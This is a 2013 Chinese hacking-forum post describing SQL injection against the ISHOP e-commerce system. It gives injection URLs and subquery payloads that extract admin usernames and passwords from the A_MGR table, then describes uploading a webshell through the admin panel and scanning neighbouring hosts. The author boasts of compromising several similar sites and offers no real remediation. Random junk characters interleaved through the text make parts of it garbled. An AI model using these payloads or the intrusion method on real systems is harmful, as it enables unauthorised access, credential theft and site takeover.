找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2225|回复: 0
打印 上一主题 下一主题

ISHOP商场建站系统注入漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2013-4-4 17:40:38 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
发现一个注入点; E# B6 \1 [1 G
http://www.xxx.com /Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI20120506105833898 g5 p0 p5 [! i

8 X+ V0 G2 F$ o  ~习惯性的加’having1=1--
' d& ], J6 Z7 L2 H1 M5 }: \2 `; s0 O8 y& u2 v' X
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’having 1=1—
4 Z- ]- g2 X% `0 v4 j
  ]0 X5 H- L7 q% c/ U6 o0
' \& G* x/ D# @/ O1 t; C8 e' B5 E# L; N
爆出Diary_A.dl_Title(这时候很激动啊)) N' q$ h. y# f+ N# Y$ G' X( H

3 E$ B6 T$ O) M; i" ]8 U. L# s那么继续  a2 H( M0 U3 j$ D5 U
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’group by dl_Title having 1=1—& a% C$ g( o& w
( q1 N5 r/ n. ^( |! S' k2 a
继续,一直爆下去7 x. ]6 I6 v7 ?, F- G

1 p3 q0 k, U9 d+ _6 D( o爆到几个字段和表段 但是没找到需要的管理用户的字段
. j6 M& ^; x$ T8 |: f
1 z3 R* e% R5 P5 d  A9 P3 }+ J蛋疼了 怎么办 然后去后台登陆页看源码; v& C& c- m. \- f7 L

' e/ a$ Q, ~) L  Z' A+ z* p0
2 w1 x1 d/ L5 [- e- E' t* [
8 ?  Y$ c" u' @+ R1 {# L5 S3 f3 q7 UInput name= “ADUID”- y; O& G- r1 m
Input name= “ADPWD”
. b0 b/ L% A' ]7 Y5 S2 k1 \: v. B
+ u7 k, Z7 c  x+ h0 R很幸运 找到了字段那就继续
1 k6 K& a, h$ j" w& E0 A* x找到之后开始爆用户) f' K" h. k. n. V* C  u' s  C
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_UID from A_MGR)>0—" L5 s" P- a6 ^
爆密码. Y! z  V9 y. n' z
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_PWD from A_MGR)>0—, K% R* `& x0 w4 G( Z& h4 o. i
测试了下 这个注入点只能爆到文章哪里的表
6 A; Q0 Y  ^, r" y  A  h/ A3 {! j& T; R
头疼 继续 既然只能报道文章哪里的表去后台爆 不过后台字符限制了
2 p& ]1 T1 X7 B; Y6 X$ q$ U' ]" |) M. D0 u
又想到 用户登录哪里也可以的吧就去试试 果然 今天我很幸运吧 爆出来了
) [7 M; }% Y0 v2 w
# g* q' `9 J7 {; t: C- v8 a473/ j# m: s& T5 A0 l& r
* Y) @8 {5 a/ O, ^/ L5 g
进后台
4 U( l0 a, R. Q( N  u
* B3 U/ X% z9 C, J
: z) K" |$ G& @& {& f$ N+ B- M发现几个上传点 有的地方不能上传 而且防止恶意代码" h" d) C# n, S  l: b- ?8 Y
0 y' e) W* H( t8 M" N' G0 N: a' S% c
没办法 各种百度各种找大牛 找到一只好像可以突破的马
, ]3 P* b8 r* m, J8 s
+ o2 v! r! p1 b. i0 B: E2 O5 B+ N+ q% t
在系统管理那里直接上传 不过没有显示地址8 N( m& U* W/ Q8 Y
& p7 l$ a. }; r! t. C' B7 V
再上传一次 抓包 搞定OK  a& r( c- o" o) B, Y2 H
$ g' c) \, [0 e8 h, Z! g

: p+ n+ g8 |! \
# m) Z* k4 [& l4724 [. O. d/ J4 k6 ^$ L0 W

: ^2 u: N5 _/ ?1 x+ }晚上不行了 去睡觉。。。
, y" Y3 \, R; u. I1 ~) H第二天刚起床 闲的没事做继续日站吧 ; F! v5 p0 h; N& V& R4 |# [

+ S2 V/ H, m% d6 x! W/ z3 X找个站 就把这个站的旁c扫了下
. l, Q: o" p( ], K9 t2 {/ k4 O1 S5 a
发现c段也有一个购物站 ,然后还和这个站的模板差不多
! b/ @+ y/ A1 ~; M; G0 x% S( |  c, a& R/ ?( |, n  W2 }
就找到会员登录口测试
( q8 `( H3 Q) J5 F
2 I% ?9 V; \  A* B) M'and (select top 1 MGR_UID from A_MGR)>0—: P' I; [  h; H3 @! m
果断爆到了 这时候我很激动 通杀
' l& E0 u7 r. S4 F6 n8 H: a: z' C) j5 l5 a, x4 a+ F
再次翻c段, X8 U$ ~6 k( y# a, K2 ~9 Q* T
$ @  Y' A6 W- U7 H. e
翻出几个站 都成功拿下' {; W/ D/ \1 p2 M% f0 Q0 v
3 b( J. n6 E) F4 z
8 J- x/ K; {. E" L/ f7 ?1 m( D

1 S: Q+ i) |+ z& n4 D7 O9 h1 ?  m修复方案:
! ~; g: N! y8 W; k他们比我专业
4 y) D- v2 k0 a; I* j
; C  F. ~+ b# N) d4 @( {7 v4 _; K* [: D' `" x) M# Z
5 B7 m) T% Q3 Y: s
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表